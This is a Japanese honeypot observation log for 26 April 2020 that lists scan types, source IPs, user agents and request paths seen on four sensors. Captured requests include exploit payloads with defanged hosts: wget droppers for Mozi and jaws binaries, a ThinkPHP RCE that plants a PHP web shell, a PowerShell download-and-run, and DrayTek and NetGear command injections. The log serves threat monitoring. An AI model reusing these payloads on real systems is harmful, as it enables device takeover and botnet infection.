2020/04/26 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2020/04/26分です。

特徴

Location：JP

Citrix製品の脆弱性(CVE-2019-19781)を狙うアクセス
DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性(CVE-2018-10561)を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
AWS Security Scannerによるスキャン行為
XTCによるスキャン行為
XTC BOTNETによるスキャン行為
zgrabによるスキャン行為
18[.]179[.]20[.]5に関する不正通信
UserAgentがHello, Worldであるアクセス
を確認しました。

Location：US

Citrix製品の脆弱性(CVE-2019-19781)を狙うアクセス
DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
polaris botnetによるスキャン行為
XTC BOTNETによるスキャン行為
zgrabによるスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

cd /tmp;
rm -rf *;
wget http[:]//ZEROTERWWGFBOT[.]hoesbigmadzero[.]tk/jaws;
sh /tmp/jaws

Location：UK

Citrix製品の脆弱性(CVE-2019-19781)を狙うアクセス
DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
polaris botnetによるスキャン行為
XTCによるスキャン行為
XTC BOTNETによるスキャン行為
zgrabによるスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location：SG

Citrix製品の脆弱性(CVE-2019-19781)を狙うアクセス
DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
polaris botnetによるスキャン行為
XTCによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

他

アクセス数推移

JP：総アクセス数：88 (前日比：+3)
US：総アクセス数：185 (前日比：+11)
UK：総アクセス数：188 (前日比：+134)
SG：総アクセス数：153 (前日比：+14)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.188.206.50	Russia
8	5.189.176.250	Germany
1	14.177.232.245	Vietnam
5	27.72.145.78	Vietnam
17	44.224.22.196	United States
17	44.225.84.206	United States
1	61.219.11.153	Taiwan
2	67.172.245.10	United States
1	72.43.195.114	United States
1	80.82.78.104	Netherlands
1	91.234.62.250	Russia
8	103.78.248.70	Bangladesh
1	125.64.94.211	China
1	150.136.221.228	United States
8	150.136.228.71	United States
1	162.243.133.99	United States
1	162.243.133.236	United States
8	169.62.49.122	United States
2	185.153.197.104	Republic of Moldova
1	200.89.98.46	Colombia
1	203.34.153.71	China
1	220.162.164.185	China

UserAgent一覧

件数	UserAgent
26	-
14	AWS Security Scanner
1	Go-http-client/1.1
2	Hello, World
1	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488)
37	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
2	Mozilla/5.0 zgrab/0.x
4	XTC
1	XTC BOTNET

リクエスト内容一覧

件数	Method	Request	Protocol
1		-
3		\x03
11		\x16\x03\x01
10	CONNECT	18[.]179[.]20[.]5:80	HTTP/1.0
1	GET	/Public/home/appjs/Index.js	HTTP/1.1
5	GET	/cgi-bin/luci	HTTP/1.1
5	GET	/dana-na/auth/url_default/welcome.cgi	HTTP/1.1
4	GET	/home.asp	HTTP/1.1
5	GET	/htmlV/welcomeMain.htm	HTTP/1.1
1	GET	/hudson	HTTP/1.1
5	GET	/index.asp	HTTP/1.1
4	GET	/latest/dynamic/instance-identity/document	HTTP/1.1
4	GET	/login.cgi?uri=	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
5	GET	/remote/login?lang=en	HTTP/1.1
4	GET	/vpn/index.html	HTTP/1.1
1	GET	/webdav/	HTTP/1.1\n
2	GET	http://[::ffff:a9fe:a9fe]/	HTTP/1.1
2	GET	http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document	HTTP/1.1
2	GET	http[:]//169[.]254[.]169[.]254/	HTTP/1.1
2	GET	http[:]//169[.]254[.]169[.]254/latest/dynamic/instance-identity/document	HTTP/1.1
2	GET	http[:]//example[.]com/	HTTP/1.1
2	POST	/GponForm/diag_Form?images/	HTTP/1.1
6	POST	/cgi-bin/mainfunction.cgi	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
3	39.108.231.180	China
1	45.95.168.133	Croatia
10	47.107.242.212	China
8	52.204.40.10	United States
4	74.95.56.222	United States
1	80.82.78.104	Netherlands
1	81.82.247.71	Belgium
1	92.63.194.15	Russia
1	103.84.4.94	Indonesia
8	104.197.12.57	United States
5	122.152.195.100	China
1	123.57.219.115	China
113	125.227.148.154	Taiwan
8	130.61.236.64	United States
8	132.145.240.2	United States
8	144.21.103.101	United States
1	186.83.41.114	Colombia
1	192.241.238.18	United States
1	201.103.23.245	Mexico
1	213.128.88.99	Turkey

UserAgent一覧

件数	UserAgent
2	-
2	Go-http-client/1.1
2	Hello, world
113	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
48	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
10	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1	Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
1	Mozilla/5.0 zgrab/0.x
2	XTC BOTNET
4	polaris botnet

リクエスト内容一覧

件数	Method	Request	Protocol
1		\x03
1	GET	/2phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/MyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/PMA/index.php?lang=en	HTTP/1.1
1	GET	/PMA2011/index.php?lang=en	HTTP/1.1
1	GET	/PMA2012/index.php?lang=en	HTTP/1.1
1	GET	/PMA2013/index.php?lang=en	HTTP/1.1
1	GET	/PMA2014/index.php?lang=en	HTTP/1.1
1	GET	/PMA2015/index.php?lang=en	HTTP/1.1
1	GET	/PMA2016/index.php?lang=en	HTTP/1.1
1	GET	/PMA2017/index.php?lang=en	HTTP/1.1
1	GET	/PMA2018/index.php?lang=en	HTTP/1.1
1	GET	/PMA2019/index.php?lang=en	HTTP/1.1
1	GET	/PMA2020/index.php?lang=en	HTTP/1.1
1	GET	/TP/html/public/index.php	HTTP/1.1
1	GET	/TP/index.php	HTTP/1.1
2	GET	/TP/public/index.php	HTTP/1.1
1	GET	/admin/db/index.php?lang=en	HTTP/1.1
1	GET	/admin/index.php?lang=en	HTTP/1.1
1	GET	/admin/pMA/index.php?lang=en	HTTP/1.1
1	GET	/admin/phpMyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/admin/phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/admin/sqladmin/index.php?lang=en	HTTP/1.1
1	GET	/admin/sysadmin/index.php?lang=en	HTTP/1.1
1	GET	/admin/web/index.php?lang=en	HTTP/1.1
1	GET	/administrator/PMA/index.php?lang=en	HTTP/1.1
1	GET	/administrator/admin/index.php?lang=en	HTTP/1.1
1	GET	/administrator/db/index.php?lang=en	HTTP/1.1
1	GET	/administrator/phpMyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/administrator/phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/administrator/pma/index.php?lang=en	HTTP/1.1
1	GET	/administrator/web/index.php?lang=en	HTTP/1.1
6	GET	/cgi-bin/luci	HTTP/1.1
6	GET	/dana-na/auth/url_default/welcome.cgi	HTTP/1.1
1	GET	/database/index.php?lang=en	HTTP/1.1
1	GET	/db/db-admin/index.php?lang=en	HTTP/1.1
1	GET	/db/dbadmin/index.php?lang=en	HTTP/1.1
1	GET	/db/dbweb/index.php?lang=en	HTTP/1.1
1	GET	/db/index.php?lang=en	HTTP/1.1
1	GET	/db/myadmin/index.php?lang=en	HTTP/1.1
1	GET	/db/phpMyAdmin-3/index.php?lang=en	HTTP/1.1
1	GET	/db/phpMyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/db/phpMyAdmin3/index.php?lang=en	HTTP/1.1
1	GET	/db/phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/db/phpmyadmin3/index.php?lang=en	HTTP/1.1
1	GET	/db/webadmin/index.php?lang=en	HTTP/1.1
1	GET	/db/webdb/index.php?lang=en	HTTP/1.1
1	GET	/db/websql/index.php?lang=en	HTTP/1.1
1	GET	/dbadmin/index.php?lang=en	HTTP/1.1
1	GET	/elrekt.php	HTTP/1.1
6	GET	/home.asp	HTTP/1.1
1	GET	/html/public/index.php	HTTP/1.1
6	GET	/htmlV/welcomeMain.htm	HTTP/1.1
6	GET	/index.asp	HTTP/1.1
1	GET	/index.php	HTTP/1.1
1	GET	/index.php?lang=en	HTTP/1.1
1	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
6	GET	/login.cgi?uri=	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
1	GET	/myadmin/index.php?lang=en	HTTP/1.1
1	GET	/mysql-admin/index.php?lang=en	HTTP/1.1
1	GET	/mysql/admin/index.php?lang=en	HTTP/1.1
1	GET	/mysql/db/index.php?lang=en	HTTP/1.1
1	GET	/mysql/dbadmin/index.php?lang=en	HTTP/1.1
1	GET	/mysql/index.php?lang=en	HTTP/1.1
1	GET	/mysql/mysqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/mysql/pMA/index.php?lang=en	HTTP/1.1
1	GET	/mysql/pma/index.php?lang=en	HTTP/1.1
1	GET	/mysql/sqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/mysql/web/index.php?lang=en	HTTP/1.1
1	GET	/mysqladmin/index.php?lang=en	HTTP/1.1
1	GET	/mysqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/php-my-admin/index.php?lang=en	HTTP/1.1
1	GET	/php-myadmin/index.php?lang=en	HTTP/1.1
1	GET	/phpMyAdmin-3/index.php?lang=en	HTTP/1.1
1	GET	/phpMyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/phpMyAdmin2/index.php?lang=en	HTTP/1.1
1	GET	/phpMyAdmin3/index.php?lang=en	HTTP/1.1
1	GET	/phpMyAdmin4/index.php?lang=en	HTTP/1.1
1	GET	/phpMyadmin/index.php?lang=en	HTTP/1.1
1	GET	/phpmy-admin/index.php?lang=en	HTTP/1.1
1	GET	/phpmy/index.php?lang=en	HTTP/1.1
1	GET	/phpmyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin1/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2011/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2012/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2013/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2014/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2015/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2016/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2017/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2018/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2019/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2020/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin3/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin4/index.php?lang=en	HTTP/1.1
1	GET	/phppma/index.php?lang=en	HTTP/1.1
1	GET	/pma/index.php?lang=en	HTTP/1.1
1	GET	/pma2011/index.php?lang=en	HTTP/1.1
1	GET	/pma2012/index.php?lang=en	HTTP/1.1
1	GET	/pma2013/index.php?lang=en	HTTP/1.1
1	GET	/pma2014/index.php?lang=en	HTTP/1.1
1	GET	/pma2015/index.php?lang=en	HTTP/1.1
1	GET	/pma2016/index.php?lang=en	HTTP/1.1
1	GET	/pma2017/index.php?lang=en	HTTP/1.1
1	GET	/pma2018/index.php?lang=en	HTTP/1.1
1	GET	/pma2019/index.php?lang=en	HTTP/1.1
1	GET	/pma2020/index.php?lang=en	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
1	GET	/program/index.php?lang=en	HTTP/1.1
1	GET	/public/index.php	HTTP/1.1
6	GET	/remote/login?lang=en	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//ZEROTERWWGFBOT[.]hoesbigmadzero[.]tk/jaws;sh+/tmp/jaws	HTTP/1.1
1	GET	/shopdb/index.php?lang=en	HTTP/1.1
1	GET	/sql/myadmin/index.php?lang=en	HTTP/1.1
1	GET	/sql/php-myadmin/index.php?lang=en	HTTP/1.1
1	GET	/sql/phpMyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/sql/phpMyAdmin2/index.php?lang=en	HTTP/1.1
1	GET	/sql/phpmanager/index.php?lang=en	HTTP/1.1
1	GET	/sql/phpmy-admin/index.php?lang=en	HTTP/1.1
1	GET	/sql/phpmyadmin2/index.php?lang=en	HTTP/1.1
1	GET	/sql/sql-admin/index.php?lang=en	HTTP/1.1
1	GET	/sql/sql/index.php?lang=en	HTTP/1.1
1	GET	/sql/sqladmin/index.php?lang=en	HTTP/1.1
1	GET	/sql/sqlweb/index.php?lang=en	HTTP/1.1
1	GET	/sql/webadmin/index.php?lang=en	HTTP/1.1
1	GET	/sql/webdb/index.php?lang=en	HTTP/1.1
1	GET	/sql/websql/index.php?lang=en	HTTP/1.1
1	GET	/sqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/thinkphp/html/public/index.php	HTTP/1.1
6	GET	/vpn/index.html	HTTP/1.1
1	GET	/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en	HTTP/1.1
1	POST	/HNAP1/	HTTP/1.0
4	POST	/boaform/admin/formPing	HTTP/1.1
3	POST	/cgi-bin/mainfunction.cgi	HTTP/1.1
1	POST	/index.php?s=captcha	HTTP/1.1

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
3	5.101.0.209	Russia
3	49.7.64.146	China
1	61.219.11.153	Taiwan
1	76.190.126.50	United States
2	80.82.78.104	Netherlands
1	96.72.189.145	United States
1	111.207.207.97	China
8	112.217.225.61	South Korea
1	113.220.24.109	China
1	123.10.60.6	China
1	128.14.134.170	United States
5	130.61.55.174	United States
5	141.145.116.229	Norway
8	158.101.198.85	United States
1	164.160.150.4	South Africa
1	175.138.194.130	Malaysia
113	178.216.94.26	Poland
1	185.75.98.234	Iraq
2	185.153.197.10	Republic of Moldova
1	188.52.121.196	Saudi Arabia
1	190.128.154.222	Paraguay
1	192.241.237.210	United States
1	192.241.239.249	United States
1	200.89.98.46	Colombia
8	200.109.65.219	Venezuela
8	200.148.140.130	Brazil
3	201.80.107.89	Brazil
1	206.223.174.86	Canada
3	212.156.82.102	Turkey
1	222.252.11.127	Vietnam

UserAgent一覧

件数	UserAgent
10	-
2	Go-http-client/1.1
1	Hello, world
3	Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
113	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
3	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
45	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
3	Mozilla/5.0 zgrab/0.x
4	XTC
1	XTC BOTNET
2	polaris botnet

リクエスト内容一覧

件数	Method	Request	Protocol
4		-
2		\x03
1	GET	/2phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/MyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/PMA/index.php?lang=en	HTTP/1.1
1	GET	/PMA2011/index.php?lang=en	HTTP/1.1
1	GET	/PMA2012/index.php?lang=en	HTTP/1.1
1	GET	/PMA2013/index.php?lang=en	HTTP/1.1
1	GET	/PMA2014/index.php?lang=en	HTTP/1.1
1	GET	/PMA2015/index.php?lang=en	HTTP/1.1
1	GET	/PMA2016/index.php?lang=en	HTTP/1.1
1	GET	/PMA2017/index.php?lang=en	HTTP/1.1
1	GET	/PMA2018/index.php?lang=en	HTTP/1.1
1	GET	/PMA2019/index.php?lang=en	HTTP/1.1
1	GET	/PMA2020/index.php?lang=en	HTTP/1.1
1	GET	/admin/db/index.php?lang=en	HTTP/1.1
1	GET	/admin/index.php?lang=en	HTTP/1.1
1	GET	/admin/pMA/index.php?lang=en	HTTP/1.1
1	GET	/admin/phpMyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/admin/phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/admin/sqladmin/index.php?lang=en	HTTP/1.1
1	GET	/admin/sysadmin/index.php?lang=en	HTTP/1.1
1	GET	/admin/web/index.php?lang=en	HTTP/1.1
1	GET	/administrator/PMA/index.php?lang=en	HTTP/1.1
1	GET	/administrator/admin/index.php?lang=en	HTTP/1.1
1	GET	/administrator/db/index.php?lang=en	HTTP/1.1
1	GET	/administrator/phpMyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/administrator/phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/administrator/pma/index.php?lang=en	HTTP/1.1
1	GET	/administrator/web/index.php?lang=en	HTTP/1.1
6	GET	/cgi-bin/luci	HTTP/1.1
6	GET	/dana-na/auth/url_default/welcome.cgi	HTTP/1.1
1	GET	/database/index.php?lang=en	HTTP/1.1
1	GET	/db/db-admin/index.php?lang=en	HTTP/1.1
1	GET	/db/dbadmin/index.php?lang=en	HTTP/1.1
1	GET	/db/dbweb/index.php?lang=en	HTTP/1.1
1	GET	/db/index.php?lang=en	HTTP/1.1
1	GET	/db/myadmin/index.php?lang=en	HTTP/1.1
1	GET	/db/phpMyAdmin-3/index.php?lang=en	HTTP/1.1
1	GET	/db/phpMyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/db/phpMyAdmin3/index.php?lang=en	HTTP/1.1
1	GET	/db/phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/db/phpmyadmin3/index.php?lang=en	HTTP/1.1
1	GET	/db/webadmin/index.php?lang=en	HTTP/1.1
1	GET	/db/webdb/index.php?lang=en	HTTP/1.1
1	GET	/db/websql/index.php?lang=en	HTTP/1.1
1	GET	/dbadmin/index.php?lang=en	HTTP/1.1
5	GET	/home.asp	HTTP/1.1
6	GET	/htmlV/welcomeMain.htm	HTTP/1.1
1	GET	/hudson	HTTP/1.1
6	GET	/index.asp	HTTP/1.1
1	GET	/index.php?lang=en	HTTP/1.1
5	GET	/login.cgi?uri=	HTTP/1.1
1	GET	/myadmin/index.php?lang=en	HTTP/1.1
1	GET	/mysql-admin/index.php?lang=en	HTTP/1.1
1	GET	/mysql/admin/index.php?lang=en	HTTP/1.1
1	GET	/mysql/db/index.php?lang=en	HTTP/1.1
1	GET	/mysql/dbadmin/index.php?lang=en	HTTP/1.1
1	GET	/mysql/index.php?lang=en	HTTP/1.1
1	GET	/mysql/mysqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/mysql/pMA/index.php?lang=en	HTTP/1.1
1	GET	/mysql/pma/index.php?lang=en	HTTP/1.1
1	GET	/mysql/sqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/mysql/web/index.php?lang=en	HTTP/1.1
1	GET	/mysqladmin/index.php?lang=en	HTTP/1.1
1	GET	/mysqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/php-my-admin/index.php?lang=en	HTTP/1.1
1	GET	/php-myadmin/index.php?lang=en	HTTP/1.1
1	GET	/phpMyAdmin-3/index.php?lang=en	HTTP/1.1
1	GET	/phpMyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/phpMyAdmin2/index.php?lang=en	HTTP/1.1
1	GET	/phpMyAdmin3/index.php?lang=en	HTTP/1.1
1	GET	/phpMyAdmin4/index.php?lang=en	HTTP/1.1
1	GET	/phpMyadmin/index.php?lang=en	HTTP/1.1
1	GET	/phpmy-admin/index.php?lang=en	HTTP/1.1
1	GET	/phpmy/index.php?lang=en	HTTP/1.1
1	GET	/phpmyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin1/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2011/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2012/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2013/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2014/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2015/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2016/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2017/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2018/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2019/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2020/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin3/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin4/index.php?lang=en	HTTP/1.1
1	GET	/phppma/index.php?lang=en	HTTP/1.1
1	GET	/pma/index.php?lang=en	HTTP/1.1
1	GET	/pma2011/index.php?lang=en	HTTP/1.1
1	GET	/pma2012/index.php?lang=en	HTTP/1.1
1	GET	/pma2013/index.php?lang=en	HTTP/1.1
1	GET	/pma2014/index.php?lang=en	HTTP/1.1
1	GET	/pma2015/index.php?lang=en	HTTP/1.1
1	GET	/pma2016/index.php?lang=en	HTTP/1.1
1	GET	/pma2017/index.php?lang=en	HTTP/1.1
1	GET	/pma2018/index.php?lang=en	HTTP/1.1
1	GET	/pma2019/index.php?lang=en	HTTP/1.1
1	GET	/pma2020/index.php?lang=en	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
1	GET	/program/index.php?lang=en	HTTP/1.1
1	GET	/public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http[:]//fid[.]hognoob[.]se/download.exe','%SystemRoot%/Temp/qrepbayknhfpayw17423.exe');start%20%SystemRoot%/Temp/qrepbayknhfpayw17423.exe	HTTP/1.1
1	GET	/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php	HTTP/1.1
1	GET	/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http[:]//fid[.]hognoob[.]se/download.exe','%SystemRoot%/Temp/qrepbayknhfpayw17423.exe');start%20%SystemRoot%/Temp/qrepbayknhfpayw17423.exe	HTTP/1.1
6	GET	/remote/login?lang=en	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//123[.]10[.]60[.]6:52621/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/shopdb/index.php?lang=en	HTTP/1.1
1	GET	/solr/	HTTP/1.1
1	GET	/sql/myadmin/index.php?lang=en	HTTP/1.1
1	GET	/sql/php-myadmin/index.php?lang=en	HTTP/1.1
1	GET	/sql/phpMyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/sql/phpMyAdmin2/index.php?lang=en	HTTP/1.1
1	GET	/sql/phpmanager/index.php?lang=en	HTTP/1.1
1	GET	/sql/phpmy-admin/index.php?lang=en	HTTP/1.1
1	GET	/sql/phpmyadmin2/index.php?lang=en	HTTP/1.1
1	GET	/sql/sql-admin/index.php?lang=en	HTTP/1.1
1	GET	/sql/sql/index.php?lang=en	HTTP/1.1
1	GET	/sql/sqladmin/index.php?lang=en	HTTP/1.1
1	GET	/sql/sqlweb/index.php?lang=en	HTTP/1.1
1	GET	/sql/webadmin/index.php?lang=en	HTTP/1.1
1	GET	/sql/webdb/index.php?lang=en	HTTP/1.1
1	GET	/sql/websql/index.php?lang=en	HTTP/1.1
1	GET	/sqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
5	GET	/vpn/index.html	HTTP/1.1
1	GET	/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en	HTTP/1.1
2	HEAD	/	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
2	POST	/boaform/admin/formPing	HTTP/1.1
7	POST	/cgi-bin/mainfunction.cgi	HTTP/1.1
2	POST	/cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//19ce033f[.]ngrok[.]io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	47.93.97.159	China
6	64.227.17.204	United States
1	68.183.192.195	United States
1	80.82.78.104	Netherlands
1	84.228.42.10	Israel
1	86.98.75.62	United Arab Emirates
1	96.250.176.142	United States
1	117.239.67.78	India
1	124.119.120.254	China
1	128.14.133.58	United States
8	129.213.109.242	United States
8	150.136.163.76	United States
8	152.67.43.61	United States
1	162.243.129.242	United States
101	175.195.116.77	South Korea
5	177.135.85.114	Brazil
2	185.153.196.243	Republic of Moldova
1	187.189.188.101	Mexico
1	188.32.198.77	Russia
1	192.241.238.205	United States
1	223.155.45.32	China

UserAgent一覧

件数	UserAgent
9	-
1	Go-http-client/1.1
1	Hello, World
1	Hello, world
101	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
29	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
2	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
2	Mozilla/5.0 zgrab/0.x
4	XTC
2	polaris botnet

リクエスト内容一覧

件数	Method	Request	Protocol
2		\x03
1	GET	//MyAdmin/scripts/setup.php	HTTP/1.1
1	GET	//myadmin/scripts/setup.php	HTTP/1.1
1	GET	//phpMyAdmin/scripts/setup.php	HTTP/1.1
1	GET	//phpmyadmin/scripts/setup.php	HTTP/1.1
1	GET	//pma/scripts/setup.php	HTTP/1.1
1	GET	/TP/index.php	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
4	GET	/cgi-bin/luci	HTTP/1.1
4	GET	/dana-na/auth/url_default/welcome.cgi	HTTP/1.1
3	GET	/home.asp	HTTP/1.1
4	GET	/htmlV/welcomeMain.htm	HTTP/1.1
1	GET	/hudson	HTTP/1.1
4	GET	/index.asp	HTTP/1.1
1	GET	/index.php	HTTP/1.1
3	GET	/login.cgi?uri=	HTTP/1.1
1	GET	/muieblackcat	HTTP/1.1
101	GET	/phpmyadmin/	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
4	GET	/remote/login?lang=en	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/solr/	HTTP/1.1
3	GET	/vpn/index.html	HTTP/1.1
1	POST	/GponForm/diag_Form?images/	HTTP/1.1
2	POST	/boaform/admin/formPing	HTTP/1.1
